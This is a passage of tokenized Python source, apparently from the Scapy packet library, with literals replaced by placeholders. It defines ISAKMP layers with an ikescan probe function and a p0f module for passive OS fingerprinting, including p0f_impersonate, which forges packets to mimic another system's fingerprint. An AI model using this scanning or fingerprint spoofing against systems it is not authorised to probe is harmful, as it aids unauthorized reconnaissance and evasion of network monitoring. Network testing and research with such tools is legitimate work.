raw_layer <EOL> elif np < len ( ISAKMP_payload_type ) : <EOL> pt = ISAKMP_payload_type [ np ] <EOL> return globals ( ) . get ( "<STR_LIT>" % pt , ISAKMP_payload ) <EOL> else : <EOL> return ISAKMP_payload <EOL> class ISAKMP ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> StrFixedLenField ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:8> ) , <EOL> StrFixedLenField ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:8> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , ISAKMP_payload_type ) , <EOL> XByteField ( "<STR_LIT:version>" , <NUM_LIT> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , ISAKMP_exchange_type ) , <EOL> FlagsField ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:8> , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> IntField ( "<STR_LIT:id>" , <NUM_LIT:0> ) , <EOL> IntField ( "<STR_LIT>" , None ) <EOL> ] <EOL> def guess_payload_class ( self , payload ) : <EOL> if self . flags & <NUM_LIT:1> : <EOL> return conf . raw_layer <EOL> return ISAKMP_class . guess_payload_class ( self , payload ) <EOL> def answers ( self , other ) : <EOL> if isinstance ( other , ISAKMP ) : <EOL> if other . init_cookie == self . init_cookie : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def post_build ( self , p , pay ) : <EOL> p += pay <EOL> if self . length is None : <EOL> p = p [ : <NUM_LIT> ] + struct . pack ( "<STR_LIT>" , len ( p ) ) + p [ <NUM_LIT> : ] <EOL> return p <EOL> class ISAKMP_payload_Transform ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ShortField ( "<STR_LIT>" , None ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> ByteEnumField ( "<STR_LIT:id>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> ShortField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ISAKMPTransformSetField ( "<STR_LIT>" , None , length_from = lambda x : x . 
length - <NUM_LIT:8> ) <EOL> ] <EOL> def post_build ( self , p , pay ) : <EOL> if self . length is None : <EOL> l = len ( p ) <EOL> p = p [ : <NUM_LIT:2> ] + bytes ( [ ( ( l >> <NUM_LIT:8> ) & <NUM_LIT> ) , ( l & <NUM_LIT> ) ] ) + p [ <NUM_LIT:4> : ] <EOL> p += pay <EOL> return p <EOL> class ISAKMP_payload_Proposal ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:8> ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:1> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:B>" ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . SPIsize ) , <EOL> PacketLenField ( "<STR_LIT>" , conf . raw_layer ( ) , ISAKMP_payload_Transform , length_from = lambda x : x . length - <NUM_LIT:8> ) , <EOL> ] <EOL> class ISAKMP_payload ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . 
length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_VendorID ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_SA ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:1> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:12> ) , <EOL> IntEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> IntEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> PacketLenField ( "<STR_LIT>" , conf . raw_layer ( ) , ISAKMP_payload_Proposal , length_from = lambda x : x . length - <NUM_LIT:12> ) , <EOL> ] <EOL> class ISAKMP_payload_Nonce ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:10> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . 
length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_KE ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:4> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_ID ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:5> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:8> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:11> : "<STR_LIT>" } ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , { <NUM_LIT:0> : "<STR_LIT>" } ) , <EOL> ShortEnumField ( "<STR_LIT>" , <NUM_LIT:0> , { <NUM_LIT:0> : "<STR_LIT>" } ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:8> ) , <EOL> ] <EOL> class ISAKMP_payload_Hash ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:8> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . 
length - <NUM_LIT:4> ) , <EOL> ] <EOL> ISAKMP_payload_type_overload = { } <EOL> for i in range ( len ( ISAKMP_payload_type ) ) : <EOL> name = "<STR_LIT>" % ISAKMP_payload_type [ i ] <EOL> if name in globals ( ) : <EOL> ISAKMP_payload_type_overload [ globals ( ) [ name ] ] = { "<STR_LIT>" : i } <EOL> del ( i ) <EOL> del ( name ) <EOL> ISAKMP_class . overload_fields = ISAKMP_payload_type_overload . copy ( ) <EOL> bind_layers ( UDP , ISAKMP , dport = <NUM_LIT> , sport = <NUM_LIT> ) <EOL> def ikescan ( ip ) : <EOL> return sr ( IP ( dst = ip ) / UDP ( ) / ISAKMP ( init_cookie = RandString ( <NUM_LIT:8> ) , <EOL> exch_type = <NUM_LIT:2> ) / ISAKMP_payload_SA ( prop = ISAKMP_payload_Proposal ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from scapy . data import KnowledgeBase <EOL> from scapy . config import conf <EOL> from scapy . error import warning <EOL> from scapy . layers . inet import IP , TCP , TCPOptions <EOL> from scapy . packet import NoPayload <EOL> conf . p0f_base = "<STR_LIT>" <EOL> conf . p0fa_base = "<STR_LIT>" <EOL> conf . p0fr_base = "<STR_LIT>" <EOL> class p0fKnowledgeBase ( KnowledgeBase ) : <EOL> def __init__ ( self , filename ) : <EOL> KnowledgeBase . __init__ ( self , filename ) <EOL> def lazy_init ( self ) : <EOL> try : <EOL> f = open ( self . filename ) <EOL> except IOError : <EOL> warning ( "<STR_LIT>" % self . filename ) <EOL> return <EOL> try : <EOL> self . base = [ ] <EOL> for l in f : <EOL> if l [ <NUM_LIT:0> ] in [ "<STR_LIT:#>" , "<STR_LIT:\n>" ] : <EOL> continue <EOL> l = tuple ( l . split ( "<STR_LIT::>" ) ) <EOL> if len ( l ) < <NUM_LIT:8> : <EOL> continue <EOL> def a2i ( x ) : <EOL> if x . isdigit ( ) : <EOL> return int ( x ) <EOL> return x <EOL> li = [ a2i ( i ) for i in l [ <NUM_LIT:1> : <NUM_LIT:4> ] ] <EOL> self . base . append ( ( l [ <NUM_LIT:0> ] , li [ <NUM_LIT:0> ] , li [ <NUM_LIT:1> ] , li [ <NUM_LIT:2> ] , l [ <NUM_LIT:4> ] , l [ <NUM_LIT:5> ] , l [ <NUM_LIT:6> ] , l [ <NUM_LIT:7> ] [ : - <NUM_LIT:1> ] ) ) <EOL> except : <EOL> warning ( "<STR_LIT>" ) <EOL> self . base = None <EOL> f . close ( ) <EOL> p0f_kdb = p0fKnowledgeBase ( conf . p0f_base ) <EOL> p0fa_kdb = p0fKnowledgeBase ( conf . p0fa_base ) <EOL> p0fr_kdb = p0fKnowledgeBase ( conf . p0fr_base ) <EOL> def p0f_selectdb ( flags ) : <EOL> if flags & <NUM_LIT> == <NUM_LIT> : <EOL> return p0f_kdb <EOL> elif flags & <NUM_LIT> == <NUM_LIT> : <EOL> return p0fa_kdb <EOL> elif flags & <NUM_LIT> in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> return p0fr_kdb <EOL> else : <EOL> return None <EOL> def packet2p0f ( pkt ) : <EOL> pkt = pkt . copy ( ) <EOL> pkt = pkt . __class__ ( bytes ( pkt ) ) <EOL> while pkt . haslayer ( IP ) and pkt . haslayer ( TCP ) : <EOL> pkt = pkt . 
getlayer ( IP ) <EOL> if isinstance ( pkt . payload , TCP ) : <EOL> break <EOL> pkt = pkt . payload <EOL> if not isinstance ( pkt , IP ) or not isinstance ( pkt . payload , TCP ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> db = p0f_selectdb ( pkt . payload . flags ) <EOL> ttl = pkt . ttl <EOL> df = ( pkt . flags & <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> ss = len ( pkt ) <EOL> if ss > <NUM_LIT:100> : <EOL> if db == p0fr_kdb : <EOL> ss = '<STR_LIT:*>' <EOL> else : <EOL> ss = <NUM_LIT:0> <EOL> ooo = "<STR_LIT>" <EOL> mss = - <NUM_LIT:1> <EOL> qqT = False <EOL> qqP = False <EOL> ilen = ( pkt . payload . dataofs << <NUM_LIT:2> ) - <NUM_LIT:20> <EOL> for option in pkt . payload . options : <EOL> ilen -= <NUM_LIT:1> <EOL> if option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT:M>" + str ( option [ <NUM_LIT:1> ] ) + "<STR_LIT:U+002C>" <EOL> mss = option [ <NUM_LIT:1> ] <EOL> ilen -= <NUM_LIT:3> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" + str ( option [ <NUM_LIT:1> ] ) + "<STR_LIT:U+002C>" <EOL> ilen -= <NUM_LIT:2> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> if option [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> ooo += "<STR_LIT>" <EOL> else : <EOL> ooo += "<STR_LIT>" <EOL> if option [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] != <NUM_LIT:0> : <EOL> qqT = True <EOL> ilen -= <NUM_LIT:9> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> ilen -= <NUM_LIT:1> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> if ilen > <NUM_LIT:0> : <EOL> qqP = True <EOL> else : <EOL> if type ( option [ <NUM_LIT:0> ] ) is str : <EOL> ooo += "<STR_LIT>" % TCPOptions [ <NUM_LIT:1> ] [ option [ <NUM_LIT:0> ] ] <EOL> else : <EOL> ooo += "<STR_LIT>" % option [ <NUM_LIT:0> ] <EOL> ooo = ooo [ : - <NUM_LIT:1> ] <EOL> if ooo == "<STR_LIT>" : ooo = "<STR_LIT:.>" <EOL> win = pkt . payload . 
window <EOL> if mss != - <NUM_LIT:1> : <EOL> if mss != <NUM_LIT:0> and win % mss == <NUM_LIT:0> : <EOL> win = "<STR_LIT:S>" + str ( win / mss ) <EOL> elif win % ( mss + <NUM_LIT> ) == <NUM_LIT:0> : <EOL> win = "<STR_LIT:T>" + str ( win / ( mss + <NUM_LIT> ) ) <EOL> win = str ( win ) <EOL> qq = "<STR_LIT>" <EOL> if db == p0fr_kdb : <EOL> if pkt . payload . flags & <NUM_LIT> == <NUM_LIT> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . seq == pkt . payload . ack : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . seq == <NUM_LIT:0> : <EOL> qq += "<STR_LIT:0>" <EOL> if qqP : <EOL> qq += "<STR_LIT:P>" <EOL> if pkt . id == <NUM_LIT:0> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . options != [ ] : <EOL> qq += "<STR_LIT:I>" <EOL> if pkt . payload . urgptr != <NUM_LIT:0> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . reserved != <NUM_LIT:0> : <EOL> qq += "<STR_LIT:X>" <EOL> if pkt . payload . ack != <NUM_LIT:0> : <EOL> qq += "<STR_LIT:A>" <EOL> if qqT : <EOL> qq += "<STR_LIT:T>" <EOL> qq += "<STR_LIT:F>" <EOL> if not isinstance ( pkt . payload . payload , NoPayload ) : <EOL> qq += "<STR_LIT:D>" <EOL> if qq == "<STR_LIT>" : <EOL> qq = "<STR_LIT:.>" <EOL> return ( db , ( win , ttl , df , ss , ooo , qq ) ) <EOL> def p0f_correl ( x , y ) : <EOL> d = <NUM_LIT:0> <EOL> d += ( x [ <NUM_LIT:0> ] == y [ <NUM_LIT:0> ] or y [ <NUM_LIT:0> ] == "<STR_LIT:*>" or ( y [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == "<STR_LIT:%>" and x [ <NUM_LIT:0> ] . isdigit ( ) and ( int ( x [ <NUM_LIT:0> ] ) % int ( y [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) ) == <NUM_LIT:0> ) ) <EOL> d += ( y [ <NUM_LIT:1> ] >= x [ <NUM_LIT:1> ] and y [ <NUM_LIT:1> ] - x [ <NUM_LIT:1> ] < <NUM_LIT:32> ) <EOL> for i in [ <NUM_LIT:2> , <NUM_LIT:5> ] : <EOL> d += ( x [ i ] == y [ i ] or y [ i ] == '<STR_LIT:*>' ) <EOL> d += x [ <NUM_LIT:3> ] == y [ <NUM_LIT:3> ] <EOL> xopt = x [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) <EOL> yopt = y [ <NUM_LIT:4> ] . 
split ( "<STR_LIT:U+002C>" ) <EOL> if len ( xopt ) == len ( yopt ) : <EOL> same = True <EOL> for i in range ( len ( xopt ) ) : <EOL> if not ( xopt [ i ] == yopt [ i ] or <EOL> ( len ( yopt [ i ] ) == <NUM_LIT:2> and len ( xopt [ i ] ) > <NUM_LIT:1> and <EOL> yopt [ i ] [ <NUM_LIT:1> ] == "<STR_LIT:*>" and xopt [ i ] [ <NUM_LIT:0> ] == yopt [ i ] [ <NUM_LIT:0> ] ) or <EOL> ( len ( yopt [ i ] ) > <NUM_LIT:2> and len ( xopt [ i ] ) > <NUM_LIT:1> and <EOL> yopt [ i ] [ <NUM_LIT:1> ] == "<STR_LIT:%>" and xopt [ i ] [ <NUM_LIT:0> ] == yopt [ i ] [ <NUM_LIT:0> ] and <EOL> int ( xopt [ i ] [ <NUM_LIT:1> : ] ) % int ( yopt [ i ] [ <NUM_LIT:2> : ] ) == <NUM_LIT:0> ) ) : <EOL> same = False <EOL> break <EOL> if same : <EOL> d += len ( xopt ) <EOL> return d <EOL> @ conf . commands . register <EOL> def p0f ( pkt ) : <EOL> """<STR_LIT>""" <EOL> db , sig = packet2p0f ( pkt ) <EOL> if db : <EOL> pb = db . get_base ( ) <EOL> else : <EOL> pb = [ ] <EOL> if not pb : <EOL> warning ( "<STR_LIT>" ) <EOL> return [ ] <EOL> r = [ ] <EOL> max = len ( sig [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) ) + <NUM_LIT:5> <EOL> for b in pb : <EOL> d = p0f_correl ( sig , b ) <EOL> if d == max : <EOL> r . append ( ( b [ <NUM_LIT:6> ] , b [ <NUM_LIT:7> ] , b [ <NUM_LIT:1> ] - pkt [ IP ] . ttl ) ) <EOL> return r <EOL> def prnp0f ( pkt ) : <EOL> try : <EOL> r = p0f ( pkt ) <EOL> except : <EOL> return <EOL> if r == [ ] : <EOL> r = ( "<STR_LIT>" , "<STR_LIT:[>" + "<STR_LIT::>" . join ( [ str ( i ) for i in packet2p0f ( pkt ) [ <NUM_LIT:1> ] ] ) + "<STR_LIT>" , None ) <EOL> else : <EOL> r = r [ <NUM_LIT:0> ] <EOL> uptime = None <EOL> try : <EOL> uptime = pkt2uptime ( pkt ) <EOL> except : <EOL> pass <EOL> if uptime == <NUM_LIT:0> : <EOL> uptime = None <EOL> res = pkt . sprintf ( "<STR_LIT>" + r [ <NUM_LIT:0> ] + "<STR_LIT:U+0020>" + r [ <NUM_LIT:1> ] ) <EOL> if uptime is not None : <EOL> res += pkt . sprintf ( "<STR_LIT>" + str ( uptime // <NUM_LIT> ) + "<STR_LIT>" ) <EOL> else : <EOL> res += pkt . 
sprintf ( "<STR_LIT>" ) <EOL> if r [ <NUM_LIT:2> ] is not None : <EOL> res += "<STR_LIT>" + str ( r [ <NUM_LIT:2> ] ) + "<STR_LIT:)>" <EOL> print ( res ) <EOL> @ conf . commands . register <EOL> def pkt2uptime ( pkt , HZ = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( pkt , Packet ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if isinstance ( pkt , NoPayload ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not isinstance ( pkt , TCP ) : <EOL> return pkt2uptime ( pkt . payload ) <EOL> for opt in pkt . options : <EOL> if opt [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> t = opt [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] / HZ <EOL> return t <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def p0f_impersonate ( pkt , osgenre = None , osdetails = None , signature = None , <EOL> extrahops = <NUM_LIT:0> , mtu = <NUM_LIT> , uptime = None ) : <EOL> """<STR_LIT>""" <EOL> pkt = pkt . copy ( ) <EOL> while pkt . haslayer ( IP ) and pkt . haslayer ( TCP ) : <EOL> pkt = pkt . getlayer ( IP ) <EOL> if isinstance ( pkt . payload , TCP ) : <EOL> break <EOL> pkt = pkt . payload <EOL> if not isinstance ( pkt , IP ) or not isinstance ( pkt . payload , TCP ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if uptime is None : <EOL> uptime = random . randint ( <NUM_LIT> , <NUM_LIT:100> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> db = p0f_selectdb ( pkt . payload . flags ) <EOL> if osgenre : <EOL> pb = db . get_base ( ) <EOL> if pb is None : <EOL> pb = [ ] <EOL> pb = [ x for x in pb if x [ <NUM_LIT:6> ] == osgenre ] <EOL> if osdetails : <EOL> pb = [ x for x in pb if x [ <NUM_LIT:7> ] == osdetails ] <EOL> elif signature : <EOL> pb = [ signature ] <EOL> else : <EOL> pb = p0f_getlocalsigs ( ) [ db ] <EOL> if db == p0fr_kdb : <EOL> if pkt . payload . 
flags & <NUM_LIT> == <NUM_LIT> : <EOL> pb = [ x for x in pb if '<STR_LIT>' in x [ <NUM_LIT:5> ] ] <EOL> else : <EOL> pb = [ x for x in pb if '<STR_LIT>' not in x [ <NUM_LIT:5> ] ] <EOL> if not pb : <EOL> raise Scapy_Exception ( "<STR_LIT>" ) <EOL> pers = pb [ random . randint ( <NUM_LIT:0> , len ( pb ) - <NUM_LIT:1> ) ] <EOL> options = [ ] <EOL> if pers [ <NUM_LIT:4> ] != '<STR_LIT:.>' : <EOL> for opt in pers [ <NUM_LIT:4> ] . split ( '<STR_LIT:U+002C>' ) : <EOL> if opt [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> if pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:S>' : <EOL> maxmss = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) / int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> maxmss = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) <EOL> if opt [ <NUM_LIT:1> : ] == '<STR_LIT:*>' : <EOL> options . append ( ( '<STR_LIT>' , random . randint ( <NUM_LIT:1> , maxmss ) ) ) <EOL> elif opt [ <NUM_LIT:1> ] == '<STR_LIT:%>' : <EOL> coef = int ( opt [ <NUM_LIT:2> : ] ) <EOL> options . append ( ( '<STR_LIT>' , coef * random . randint ( <NUM_LIT:1> , maxmss / coef ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , int ( opt [ <NUM_LIT:1> : ] ) ) ) <EOL> elif opt [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if opt [ <NUM_LIT:1> : ] == '<STR_LIT:*>' : <EOL> options . append ( ( '<STR_LIT>' , RandByte ( ) ) ) <EOL> elif opt [ <NUM_LIT:1> ] == '<STR_LIT:%>' : <EOL> coef = int ( opt [ <NUM_LIT:2> : ] ) <EOL> options . append ( ( '<STR_LIT>' , coef * RandNum ( min = <NUM_LIT:1> , <EOL> max = ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) / coef ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , int ( opt [ <NUM_LIT:1> : ] ) ) ) <EOL> elif opt == '<STR_LIT>' : <EOL> options . append ( ( '<STR_LIT>' , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> elif opt == '<STR_LIT:T>' : <EOL> if '<STR_LIT:T>' in pers [ <NUM_LIT:5> ] : <EOL> options . append ( ( '<STR_LIT>' , ( uptime , random . 
randint ( <NUM_LIT:1> , <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> ) ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , ( uptime , <NUM_LIT:0> ) ) ) <EOL> elif opt == '<STR_LIT:S>' : <EOL> options . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> elif opt == '<STR_LIT:N>' : <EOL> options . append ( ( '<STR_LIT>' , None ) ) <EOL> elif opt == '<STR_LIT:E>' : <EOL> options . append ( ( '<STR_LIT>' , None ) ) <EOL> elif opt [ <NUM_LIT:0> ] == '<STR_LIT:?>' : <EOL> if int ( opt [ <NUM_LIT:1> : ] ) in TCPOptions [ <NUM_LIT:0> ] : <EOL> optname = TCPOptions [ <NUM_LIT:0> ] [ int ( opt [ <NUM_LIT:1> : ] ) ] [ <NUM_LIT:0> ] <EOL> optstruct = TCPOptions [ <NUM_LIT:0> ] [ int ( opt [ <NUM_LIT:1> : ] ) ] [ <NUM_LIT:1> ] <EOL> options . append ( ( optname , <EOL> struct . unpack ( optstruct , <EOL> RandString ( struct . calcsize ( optstruct ) ) . _fix ( ) ) ) ) <EOL> else : <EOL> options . append ( ( int ( opt [ <NUM_LIT:1> : ] ) , '<STR_LIT>' ) ) <EOL> else : <EOL> warning ( "<STR_LIT>" + opt ) <EOL> pkt . payload . options = options <EOL> if pers [ <NUM_LIT:0> ] == '<STR_LIT:*>' : <EOL> pkt . payload . window = RandShort ( ) <EOL> elif pers [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> pkt . payload . window = int ( pers [ <NUM_LIT:0> ] ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:%>' : <EOL> coef = int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> pkt . payload . window = coef * RandNum ( min = <NUM_LIT:1> , max = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) / coef ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:T>' : <EOL> pkt . payload . window = mtu * int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:S>' : <EOL> MSS = [ x for x in options if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> if not MSS : <EOL> raise Scapy_Exception ( "<STR_LIT>" ) <EOL> pkt . payload . 
window = MSS [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] * int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> raise Scapy_Exception ( '<STR_LIT>' ) <EOL> pkt . ttl = pers [ <NUM_LIT:1> ] - extrahops <EOL> pkt . flags |= ( <NUM_LIT:2> * pers [ <NUM_LIT:2> ] ) <EOL> if pers [ <NUM_LIT:5> ] != '<STR_LIT:.>' : <EOL> for qq in pers [ <NUM_LIT:5> ] : <EOL> if qq == '<STR_LIT>' : pkt . id = <NUM_LIT:0> <EOL> elif qq == '<STR_LIT>' : pkt . payload . urgptr = RandShort ( ) <EOL> elif qq == '<STR_LIT:A>' : pkt . payload . ack = RandInt ( ) <EOL> elif qq == '<STR_LIT:F>' : <EOL> pkt . payload . flags |= RandChoice ( <NUM_LIT:8> , <NUM_LIT:32> , <NUM_LIT> ) <EOL> elif qq == '<STR_LIT:D>' and db != p0fo_kdb : <EOL> pkt /= conf . raw_layer ( load = RandString ( random . randint ( <NUM_LIT:1> , <NUM_LIT:10> ) ) ) <EOL> elif qq == '<STR_LIT>' : pkt . payload . seq = pkt . payload . ack <EOL> if '<STR_LIT:0>' in pers [ <NUM_LIT:5> ] : <EOL> pkt . payload . seq = <NUM_LIT:0> <EOL> elif pkt . payload . seq == <NUM_LIT:0> : <EOL> pkt . payload . seq = RandInt ( ) <EOL> while pkt . underlayer : <EOL> pkt = pkt . underlayer <EOL> return pkt <EOL> def p0f_getlocalsigs ( ) : <EOL> """<STR_LIT>""" <EOL> pid = os . fork ( ) <EOL> port = random . randint ( <NUM_LIT> , <NUM_LIT> ) <EOL> if pid > <NUM_LIT:0> : <EOL> result = { } <EOL> def addresult ( res ) : <EOL> if res [ <NUM_LIT:0> ] not in result : <EOL> result [ res [ <NUM_LIT:0> ] ] = [ res [ <NUM_LIT:1> ] ] <EOL> else : <EOL> if res [ <NUM_LIT:1> ] not in result [ res [ <NUM_LIT:0> ] ] : <EOL> result [ res [ <NUM_LIT:0> ] ] . append ( res [ <NUM_LIT:1> ] 